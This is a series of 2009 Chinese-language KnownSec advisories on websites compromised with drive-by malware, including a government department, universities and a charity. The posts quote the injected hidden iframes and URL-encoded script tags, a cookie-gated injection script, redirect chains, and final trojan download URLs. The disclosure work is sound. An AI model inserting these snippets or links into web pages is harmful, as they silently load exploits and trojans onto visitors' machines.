知道创宇

发布时间：Wed Sep 30 2009 13:28:58 UTC+0800
最后更新时间：Wed Sep 30 2009 13:28:58 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 冰城宝宝之家（http://www.hljbb.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hljbb.com/bbs/include/js/common.js?bae

网页被嵌入恶意链接代码：

document.write(”<iframe src=http://woainisnjmdb.3322.org/jj/5.htm width=0 height=0 border=0></iframe>”);
挂马分析：
[root]http://www.hljbb.com/bbs/include/js/common.js?bae
[iframe]http://woainisnjmdb.3322.org/jj/5.htm
[iframe]http://urj0.cn/x16/xx.html
[iframe]http://urj0.cn/x16/td14.htm
[script]http://urj0.cn/x16/14.js
http://d.fgddx.com/xx/x16.css
[script]http://urj0.cn/x16/15.js
[script]http://urj0.cn/x16/17.js
[script]http://urj0.cn/x16/16.js
[script]http://urj0.cn/x16/18.js
[iframe]http://urj0.cn/x16/yt.htm
[script]http://urj0.cn/x16/k8.jpg
[script]http://urj0.cn/x16/kb.jpg
[script]http://urj0.cn/x16/url.jpg
http://d.fgddx.com/xx/x16.css
[script]http://urj0.cn/x16/c.jpg
[script]http://urj0.cn/x16/d.jpg
[script]http://urj0.cn/x16/e.jpg
[script]http://urj0.cn/x16/f.jpg
[iframe]http://urj0.cn/x16/td09.htm
[script]http://urj0.cn/x16/01.js
http://d.fgddx.com/xx/x16.css
[script]http://urj0.cn/x16/02.js
[iframe]http://urj0.cn/x16/yut.htm
[iframe]http://urj0.cn/x16/ytfl.htm
[iframe]http://urj0.cn/x16/ff.html
[script]http://urj0.cn/x16/ff.js
http://d.fgddx.com/xx/x16.css
[iframe]http://urj0.cn/x16/ie.html
[script]http://urj0.cn/x16/ie.js
http://d.fgddx.com/xx/x16.css
[iframe]http://urj0.cn/x16/ff.html
[iframe]http://urj0.cn/x16/ie.html
[iframe]http://urj0.cn/x16/ff.html
[iframe]http://urj0.cn/x16/ff.html
[iframe]http://urj0.cn/x16/ytfl1.htm
[iframe]http://urj0.cn/x16/x1.htm
[script]http://urj0.cn/x16/swfobject.js
[flash]http://urj0.cn/x16/./x1.swf
http://d.fgddx.com/xx/x16.css
[flash]http://urj0.cn/x16/./x3.swf
http://d.fgddx.com/xx/x16.css
[flash]http://urj0.cn/x16/./x4.swf
http://d.fgddx.com/xx/x16.css
[flash]http://urj0.cn/x16/./x2.swf
http://d.fgddx.com/xx/x16.css
[iframe]http://urj0.cn/x16/x2.htm
[script]http://urj0.cn/x16/swfobject.js
[flash]http://urj0.cn/x16/./x7.swf
http://d.fgddx.com/xx/x16.css
[flash]http://urj0.cn/x16/./x9.swf
http://d.fgddx.com/xx/x16.css
[flash]http://urj0.cn/x16/./x10.swf
http://d.fgddx.com/xx/x16.css
[flash]http://urj0.cn/x16/./x8.swf
http://d.fgddx.com/xx/x16.css
[iframe]http://urj0.cn/x16/x1.htm
[iframe]http://urj0.cn/x16/of.htm
[script]http://urj0.cn/x16/of.js
http://d.fgddx.com/xx/x16.css
[script]http://urj0.cn/x16/of3.jpg
[script]http://urj0.cn/x16/of.jpg
[script]http://urj0.cn/x16/of2.jpg
最终下载病毒文件：
http://d.fgddx.com/xx/x16.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Tue Sep 29 2009 11:28:17 UTC+0800
最后更新时间：Tue Sep 29 2009 11:28:17 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 PP点点通官方网站（http://www.pp365.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:
http://download.pp365.com/
http://movie.pp365.com/
http://vod.pp365.com/

网页被嵌入恶意链接代码：

<iframe src=http://zndxyey.8866.org/kuaile/11.htm width=1 height=0></iframe>
挂马分析：
[root]http://zndxyey.8866.org/kuaile/11.htm
[iframe]http://8lz4.cn/x56/xx.html
[iframe]http://8lz4.cn/x56/td14.htm
[script]http://8lz4.cn/x56/14.js
[exe]http://d.fgddx.com/xx/x56.css
[script]http://8lz4.cn/x56/15.js
[script]http://8lz4.cn/x56/17.js
[script]http://8lz4.cn/x56/16.js
[script]http://8lz4.cn/x56/18.js
[iframe]http://8lz4.cn/x56/yt.htm
[script]http://8lz4.cn/x56/k8.jpg
[script]http://8lz4.cn/x56/kb.jpg
[script]http://8lz4.cn/x56/url.jpg
[exe]http://d.fgddx.com/xx/x56.css
[script]http://8lz4.cn/x56/c.jpg
[script]http://8lz4.cn/x56/d.jpg
[script]http://8lz4.cn/x56/e.jpg
[script]http://8lz4.cn/x56/f.jpg
[iframe]http://8lz4.cn/x56/td09.htm
[script]http://8lz4.cn/x56/01.js
[exe]http://d.fgddx.com/xx/x56.css
[script]http://8lz4.cn/x56/02.js
[iframe]http://8lz4.cn/x56/yut.htm
[iframe]http://8lz4.cn/x56/ytfl.htm
[iframe]http://8lz4.cn/x56/ff.html
[script]http://8lz4.cn/x56/ff.js
[exe]http://d.fgddx.com/xx/x56.css
[iframe]http://8lz4.cn/x56/ie.html
[script]http://8lz4.cn/x56/ie.js
[exe]http://d.fgddx.com/xx/x56.css
[iframe]http://8lz4.cn/x56/ff.html
[iframe]http://8lz4.cn/x56/ie.html
[iframe]http://8lz4.cn/x56/ff.html
[iframe]http://8lz4.cn/x56/ff.html
[iframe]http://8lz4.cn/x56/ytfl1.htm
[iframe]http://8lz4.cn/x56/x1.htm
[script]http://8lz4.cn/x56/swfobject.js
[flash]http://8lz4.cn/x56/./x1.swf
[exe]http://d.fgddx.com/xx/x56.css
[flash]http://8lz4.cn/x56/./x3.swf
[exe]http://d.fgddx.com/xx/x56.css
[flash]http://8lz4.cn/x56/./x4.swf
[exe]http://d.fgddx.com/xx/x56.css
[flash]http://8lz4.cn/x56/./x2.swf
[exe]http://d.fgddx.com/xx/x56.css
[iframe]http://8lz4.cn/x56/x2.htm
[script]http://8lz4.cn/x56/swfobject.js
[flash]http://8lz4.cn/x56/./x7.swf
[exe]http://d.fgddx.com/xx/x56.css
[flash]http://8lz4.cn/x56/./x9.swf
[exe]http://d.fgddx.com/xx/x56.css
[flash]http://8lz4.cn/x56/./x10.swf
[exe]http://d.fgddx.com/xx/x56.css
[flash]http://8lz4.cn/x56/./x8.swf
[exe]http://d.fgddx.com/xx/x56.css
[iframe]http://8lz4.cn/x56/x1.htm
[iframe]http://8lz4.cn/x56/of.htm
[script]http://8lz4.cn/x56/of.js
[exe]http://d.fgddx.com/xx/x56.css
[script]http://8lz4.cn/x56/of3.jpg
[script]http://8lz4.cn/x56/of.jpg
[script]http://8lz4.cn/x56/of2.jpg
最终下载病毒文件：
http://d.fgddx.com/xx/x56.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 12% [?]

关于北斗手机网：
北斗手机网是国内最大的手机电子商务网站,致力于提供手机的B2C、B2B和资讯服务。在hao123网址之家手机频道有该网站的链接。

知道创宇网马监控平台早先于9月24日监测到北斗手机网挂马(139shop.com)，当时我仅仅简单的检查了一下主页和其他报警页面里面有没有可以的框架、脚本，没发现这些以后以为是误报。

昨天晚上终于发现了问题的所在。
这里截取choose.139shop.com上的一段代码：
<script language=”javascript”>
function advInsert(advName,advid,widthNum,heightNum)
{
htmlStr=”<iframe src=’http://eva.139shop.com/adv/adv.asp?id=“+advid+”‘ width=’”+widthNum+”‘ “;
htmlStr=htmlStr+”height=’”+heightNum+”‘ scrolling=’no’ frameborder=’0′ marginwidth=’0′ ”
htmlStr=htmlStr+”marginheight=’0′></iframe>”;

document.getElementById(advName,advid).innerHTML=htmlStr;
}
window.setTimeout(”advInsert(’Banner1′,266,761,80);”,1000);
window.setTimeout(”advInsert(’paneRight’,497,200,200);”,1000);
</script>

这里构造了一个特殊的框架，在打开页面1秒钟之后才会插入框架。
恢复框架链接可得到以下两个链接：
http://eva.139shop.com/adv/adv.asp?id=266
http://eva.139shop.com/adv/adv.asp?id=497

分别跟入两个链接，可以得到类似一下代码(id=497)：
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.1//EN” “http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd”>

<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<title>广告</title>
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
<style type=”text/css”>
body{margin:0px;padding:0px;border:0;}
</style>
</head>
<body>
<script language=”javascript”>
var myTime=new Date(2009,8,28,11,30,13);
</script>
<script language=”javascript” type=”text/javascript” src=”/adv/file/497.js”></script>  //这里的文件名即id号

</body>
</html>

跟入266.js未发现恶意代码，继续跟入497.js发现最下面的恶意代码：
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = “Cookie1=risb;expires=”+ Then.toGMTString()
document.write(”<div style=\”display:none\”>”);
document.write(”<iframe width=’0′ height=’0′ src=’http://968596969.9966.org/kuaile789/8.htm‘></iframe>”);
document.writeln(”<iframe width=’0′ height=’0′ src=’http://www.mszqw.com/1.html‘></iframe>”);
}
}Get();

该挂马利用了cookie的方法来防止重复感染，当成功执行挂马代码之后，1000天内不会再被感染。

其中http://968596969.9966.org/kuaile789/8.htm是挂马链接，http://www.mszqw.com/1.html间接引用51la的统计，记录点击数。

以下是http://968596969.9966.org/kuaile789/8.htm的分析报告
[root]http://968596969.9966.org/kuaile789/8.htm
[iframe]http://nm11df.cn/x50/xx.html
[iframe]http://nm11df.cn/x50/td14.htm
[script]http://nm11df.cn/x50/14.js
[exe]http://d.fgddx.com/xx/x50.css
[script]http://nm11df.cn/x50/15.js
[script]http://nm11df.cn/x50/17.js
[script]http://nm11df.cn/x50/16.js
[script]http://nm11df.cn/x50/18.js
[iframe]http://nm11df.cn/x50/yt.htm
[script]http://nm11df.cn/x50/k8.jpg
[script]http://nm11df.cn/x50/b.jpg
[script]http://nm11df.cn/x50/url.jpg
[exe]http://d.fgddx.com/xx/x50.css
[script]http://nm11df.cn/x50/c.jpg
[script]http://nm11df.cn/x50/d.jpg
[script]http://nm11df.cn/x50/e.jpg
[script]http://nm11df.cn/x50/f.jpg
[iframe]http://nm11df.cn/x50/td09.htm
[script]http://nm11df.cn/x50/01.js
http://d.fgddx.com/xx/x50.css
[script]http://nm11df.cn/x50/02.js
[iframe]http://nm11df.cn/x50/yut.htm
[iframe]http://nm11df.cn/x50/ytfl.htm
[iframe]http://nm11df.cn/x50/ff.html
[script]http://nm11df.cn/x50/ff.js
http://d.fgddx.com/xx/x50.css
[iframe]http://nm11df.cn/x50/ie.html
[script]http://nm11df.cn/x50/ie.js
http://d.fgddx.com/xx/x50.css
[iframe]http://nm11df.cn/x50/ff.html
[iframe]http://nm11df.cn/x50/ie.html
[iframe]http://nm11df.cn/x50/ff.html
[iframe]http://nm11df.cn/x50/ff.html
[iframe]http://nm11df.cn/x50/ytfl1.htm
[iframe]http://nm11df.cn/x50/x1.htm
[script]http://nm11df.cn/x50/swfobject.js
[flash]http://nm11df.cn/x50/./x1.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x3.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x4.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x2.swf
http://d.fgddx.com/xx/x50.css
[iframe]http://nm11df.cn/x50/x2.htm
[script]http://nm11df.cn/x50/swfobject.js
[flash]http://nm11df.cn/x50/./x7.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x9.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x10.swf
http://d.fgddx.com/xx/x50.css
[flash]http://nm11df.cn/x50/./x8.swf
http://d.fgddx.com/xx/x50.css
[iframe]http://nm11df.cn/x50/x1.htm
[iframe]http://nm11df.cn/x50/of.htm
[script]http://nm11df.cn/x50/of.js
http://d.fgddx.com/xx/x50.css
[script]http://nm11df.cn/x50/of3.jpg
[script]http://nm11df.cn/x50/of.jpg
[script]http://nm11df.cn/x50/of2.jpg
[script]http://tongji.linezing.com/1242634/tongji.js

知道安全团队希望北斗手机网的管理员尽快清除以下脚本文件中存在的恶意代码，以免更多的用户受到威胁：
http://eva.139shop.com/adv/file/6.js
http://eva.139shop.com/adv/file/161.js
http://eva.139shop.com/adv/file/296.js
http://eva.139shop.com/adv/file/376.js
http://eva.139shop.com/adv/file/495.js
http://eva.139shop.com/adv/file/497.js

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Sun Sep 27 2009 20:04:20 UTC+0800
最后更新时间：Sun Sep 27 2009 20:04:20 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 北斗手机网（http://www.139shop.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:
http://eva.139shop.com/adv/file/6.js
http://eva.139shop.com/adv/file/161.js
http://eva.139shop.com/adv/file/296.js
http://eva.139shop.com/adv/file/376.js
http://eva.139shop.com/adv/file/495.js
http://eva.139shop.com/adv/file/497.js

网页被嵌入恶意链接代码：

function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = “Cookie1=risb;expires=”+ Then.toGMTString()
document.write(”<div style=\”display:none\”>”);
document.write(”<iframe width=’0′ height=’0′ src=’http://888999555.9966.org/kuaile789/8.htm’></iframe>”);
document.writeln(”<iframe width=’0′ height=’0′ src=’http://www.mszqw.com/1.html’></iframe>”);
}
}Get();
挂马分析：
[root]http://eva.139shop.com/adv/adv.asp?id=495
[script]http://eva.139shop.com/adv/file/495.js
[iframe]http://888999555.9966.org/kuaile789/8.htm
[iframe]http://nm11df.cn/x50/xx.html
[iframe]http://nm11df.cn/x50/td14.htm
[iframe]http://nm11df.cn/x50/yt.htm
[iframe]http://nm11df.cn/x50/td09.htm
[iframe]http://nm11df.cn/x50/yut.htm
[iframe]http://nm11df.cn/x50/ytfl.htm
[iframe]http://nm11df.cn/x50/ytfl1.htm
[iframe]http://nm11df.cn/x50/of.htm
[iframe]http://www.mszqw.com/1.html
最终下载病毒文件：
http://d.fgddx.com/xx/x50.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Sun Sep 27 2009 10:54:22 UTC+0800
最后更新时间：Sun Sep 27 2009 10:54:22 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 莫非网（http://www.mofei.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.mofei.com.cn/ad/comic.html

网页被嵌入恶意链接代码：

<iframe src=”http://925kill360.3322.org/kuaile/4.htm” width=100 height=0></iframe>
挂马分析：
Log generated by issmall use mdecoder 0.23
[root]http://www.mofei.com.cn/ad/comic.html
[iframe]http://925kill360.3322.org/kuaile/4.htm
[iframe]http://crsa1.cn/x9/xx.html
[iframe]http://crsa1.cn/x9/td14.htm
[iframe]http://crsa1.cn/x9/yt.htm
[iframe]http://crsa1.cn/x9/td09.htm
[iframe]http://crsa1.cn/x9/yut.htm
[iframe]http://crsa1.cn/x9/ytfl.htm
[iframe]http://crsa1.cn/x9/ytfl1.htm
[iframe]http://crsa1.cn/x9/of.htm
最终下载病毒文件：
http://d.fgddx.com/xx/x9.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Sat Sep 26 2009 12:49:05 UTC+0800
最后更新时间：Sat Sep 26 2009 12:49:05 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中共山东省委统战部（http://www.sdtzb.org.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.sdtzb.org.cn/

网页被嵌入恶意链接代码：

<script src=http://%73%70%6F%72%74%73%62%61%79%2E%63%6E></script>
挂马分析：
[root]http://www.sdtzb.org.cn/
[script]http://%73%70%6f%72%74%73%62%61%79%2e%63%6e
[iframe]http://rdso.8800.org/dszq/2.htm
[iframe]http://ygfc1.cn/x2/xx.html
[iframe]http://ygfc1.cn/x2/td14.htm
[iframe]http://ygfc1.cn/x2/yt.htm
[iframe]http://ygfc1.cn/x2/td09.htm
[iframe]http://ygfc1.cn/x2/yut.htm
[iframe]http://ygfc1.cn/x2/ytfl.htm
[iframe]http://ygfc1.cn/x2/ytfl1.htm
[iframe]http://ygfc1.cn/x2/of.htm
最终下载病毒文件：
http://d.fgddx.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：5
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Fri Sep 25 2009 18:45:12 UTC+0800
最后更新时间：Fri Sep 25 2009 18:45:12 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 山东科技大学济南校区（http://www.ustsd.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://eeit.ustsd.edu.cn/

网页被嵌入恶意链接代码：

<script src=http://%79%61%6f%4c%69%68%75%69%2e%63%6e></script>
挂马分析：
[root]http://eeit.ustsd.edu.cn/
[script]http://%79%61%6f%4c%69%68%75%69%2e%63%6e
[iframe]http://qkjh.7766.org/dszq/2.htm
[iframe]http://ygfc1.cn/x2/xx.html
[iframe]http://ygfc1.cn/x2/td14.htm
[iframe]http://ygfc1.cn/x2/yt.htm
[iframe]http://ygfc1.cn/x2/td09.htm
[iframe]http://ygfc1.cn/x2/yut.htm
[iframe]http://ygfc1.cn/x2/ytfl.htm
[iframe]http://ygfc1.cn/x2/ytfl1.htm
[iframe]http://ygfc1.cn/x2/of.htm
最终下载病毒文件：
http://d.fgddx.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：5
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

发布时间：Fri Sep 25 2009 18:36:30 UTC+0800
最后更新时间：Fri Sep 25 2009 18:36:30 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 论文指导网（http://www.lwzdw.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.lwzdw.com/

网页被嵌入恶意链接代码：

<script language=javascript src=http://%64%78%6F%2E%78%6F%72%67%2E%70%6C/x.js?google_ad=99×23_ad></script>
挂马分析：
[root]http://www.lwzdw.com/
[script]http://%64%78%6f%2e%78%6f%72%67%2e%70%6c/x.js?google_ad=99×23_ad
[iframe]http://abk.dns0755.net/370/360.htm
[iframe]http://abk.dns0755.net/370/yt.htm
[script]http://abk.dns0755.net/370/yt.js
[iframe]http://abk.dns0755.net/370/xie.htm
[iframe]http://abk.dns0755.net/370/office.htm
[iframe]http://abk.dns0755.net/370/newlz.htm
[iframe]http://abk.dns0755.net/370/of.htm
[iframe]http://abk.dns0755.net/370/bf.htm
[script]http://abk.dns0755.net/370/aa.js
[iframe]http://abk.dns0755.net/370/aa.htm
[iframe]http://abk.dns0755.net/370/ff.html
[iframe]http://abk.dns0755.net/370/ie.html
[iframe]http://abk.dns0755.net/370/ff.html
[iframe]http://abk.dns0755.net/370/ie.html
[iframe]http://abk.dns0755.net/370/ff.html
[iframe]http://abk.dns0755.net/370/ff.html
最终下载病毒文件：
http://abk.dns0755.net/f/dd.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

发布时间：Thu Sep 24 2009 19:02:53 UTC+0800
最后更新时间：Thu Sep 24 2009 19:02:53 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 山东科技大学泰安校区大学生就业指导中心（http://tajy.sdust.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://tajy.sdust.edu.cn/

网页被嵌入恶意链接代码：

<iframe src=http://%77%65%62%61%64%6d%69%6e%2e%38%38%30%30%2e%6f%72%67/inc/ad.htm width=0 height=0></iframe>
挂马分析：
[root]http://tajy.sdust.edu.cn/
[iframe]http://%77%65%62%61%64%6d%69%6e%2e%38%38%30%30%2e%6f%72%67/inc/ad.htm
[iframe]http://m.99081.com/zrzc/zzz.htm
[iframe]http://m.99081.com/zrzc/logo.jpg
[script]http://m.99081.com/zrzc/go.jpg
最终下载病毒文件：
http://m.99081.com/zrzc/MPEG-2.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：17
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]

发布时间：Wed Sep 23 2009 20:07:38 UTC+0800
最后更新时间：Wed Sep 23 2009 20:07:38 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 青海省慈善总会（http://www.qhcsw.org/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.qhcsw.org/

网页被嵌入恶意链接代码：

<script src=http://%77%2E%74%6F%79%6F%6E%79%2E%63%6F%6D%2E%63%6E></script>
<script src=http://%67%75%61%6E%6C%69%73%2E%63%6E></script><script src=http://%6D%61%73%68%75%63%6E%2E%63%6E></script><script src=http://%6A%6F%63%6B%65%79%62%62%73%2E%63%6E></script><script src=http://%79%75%68%61%69%77%65%69%2E%63%6E></script>
挂马分析：
[root]http://www.qhcsw.org/
[script]http://%77%2e%74%6f%79%6f%6e%79%2e%63%6f%6d%2e%63%6e
[iframe]http://qhjk.7766.org/dszq/2.htm
[iframe]http://28773.cn/x2/xx.html
[iframe]http://28773.cn/x2/td14.htm
[iframe]http://28773.cn/x2/yt.htm
[iframe]http://28773.cn/x2/td09.htm
[iframe]http://28773.cn/x2/yut.htm
[iframe]http://28773.cn/x2/ytfl.htm
[iframe]http://28773.cn/x2/ytfl1.htm
[iframe]http://28773.cn/x2/of.htm
最终下载病毒文件：
http://d.fgddx.com/xx/x2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

该网站历史挂马次数：14
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]